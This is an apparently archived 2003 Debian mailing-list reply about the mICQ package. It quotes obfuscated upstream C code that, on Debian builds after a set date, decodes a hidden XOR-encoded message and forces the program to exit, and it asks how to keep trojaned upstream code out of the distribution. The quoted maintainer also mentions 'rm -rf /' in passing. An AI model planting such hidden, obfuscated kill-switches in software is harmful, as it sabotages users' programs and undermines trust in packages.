[Ruediger, Joerg, cc'ed for your convenience since you're mentioned by
name and may wish to respond]
On Thu, Feb 13, 2003 at 04:14:20PM +0100, Martin Loschwitz wrote:
> Again, this "easter egg" is debian specific - it will only occur on computers
> running Debian and using the official Debian mICQ package.
So, basically, what you're saying is that you uploaded a package to Debian
that included some malicious and obfuscated code from upstream, that
neither you nor your sponsor (Joerg Jaspert according to the signature
on the .changes; who appears to be Ruediger's AM too) spotted. The code
in question, for those playing along at home, is (with minor reformatting
to fit into 80 cols):
#if defined(__Dbn__) && __Dbn__ != -1 && !defined (EXTRAVERSION)
if (me[0] != 'm' || me[1] != 'a' || me[2] != 'd' || me[3] != 'k' ||
me[4] != 'i' || me[5] != 's' || me[6] != 's' || me[7])
if (time (NULL) > 1045000000)
{
const char *parts[] = {
"\n\n\eX0282nZlv$qf#vpjmd#wkf#nJ@R#sb`hbdf#sqlujgfg#az",
"#Gfajbm-#Pjm`f#wkf#Gfajbm#nbjmwbjmfq#jp#f{wqfnfoz#",
"vm`llsfqbwjuf/#zlv$qf#bguj`fg#wl#vpf#wkf#afwwfq#rv",
"bojwz#sb`hbdf#eqln#nj`r-lqd-#Pjnsoz#bgg#wkf#eloolt",
"jmd#ojmf#wl#zlvq#,fw`,bsw,plvq`fp-ojpw#wl#wqb`h#pw",
"baof#ufqpjlmp#le#nJ@R9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd",
",gfajbm#pwbaof#nbjm\n\eX0282nWl#wqb`h#@UP#pmbspklwp/",
"#bgg9\eX3n\ngfa#kwws9,,ttt-nj`r-lqd,gfajbm#wfpwjmd#n",
"bjm\n\eX0282nPlvq`f#sb`hbdfp#nbz#af#qfwqjfufg#pjnjob",
"qoz-\eX3n\n\n " };
char buf[52];
int i, j;
for (i = 0; i < 10; i++)
{
for (j = 0; j < 50; j++)
buf[j] = parts[i][j] > 30 ? parts[i][j] ^ 3 : parts[i][j];
buf[j] = '\0';
M_print (buf);
}
exit (99);
}
#endif
Given the recent spate of exploits of upstream ftp sites and security
problems with CVS, and so forth, that this has happened seems fairly
concerning to me.
> In my opinion, with this step, mICQ has proven as dishonorable to be
> distributed with Debian anymore (especially since nobody knows what idea
> upstream will have as next, maybe it's a very funny 'rm -rf /'?). Thus, i
> would like to request removal of the package from distribution.
As maintainer of the package, you don't have to give any reasons for
requesting its removal.
> Additionally, I suggest to consider to add this piece of software to the
> "unable to package" list[1].
On the other hand, this makes no sense at all. The package doesn't have
intractable security holes, or license problems, and the bugs that've
gotten us into this mess are all trivial to fix. From what I've read of
his posts, the upstream author doesn't even seem particularly unreasonable
in any of his demands, or even particularly more obnoxious than various
other people around the place.
So anyway, as a new maintainer candidate who's apparently already passed
the various checks, what are your thoughts on:
(a) avoiding packages that've been trojaned upstream entering
Debian, either through a Debian maintainer or via the
sponsorship system?
(b) how to best interact with upstream maintainers that can get
exceedingly obnoxious?
Personally, "drop any and all packages that these could affect" seems
like a pretty poor solution, both in that it loses the most functionality
of all possible solutions, and in that it can only be done after the fact.
Cheers,
aj
--
Anthony Towns <aj@humbug.org.au> <http://azure.humbug.org.au/~aj/>
I don't speak for anyone save myself. GPG signed mail preferred.
``Dear Anthony Towns: [...] Congratulations --
you are now certified as a Red Hat Certified Engineer!''
Attachment:
pgpStWXtmbAOg.pgp
Description: PGP signature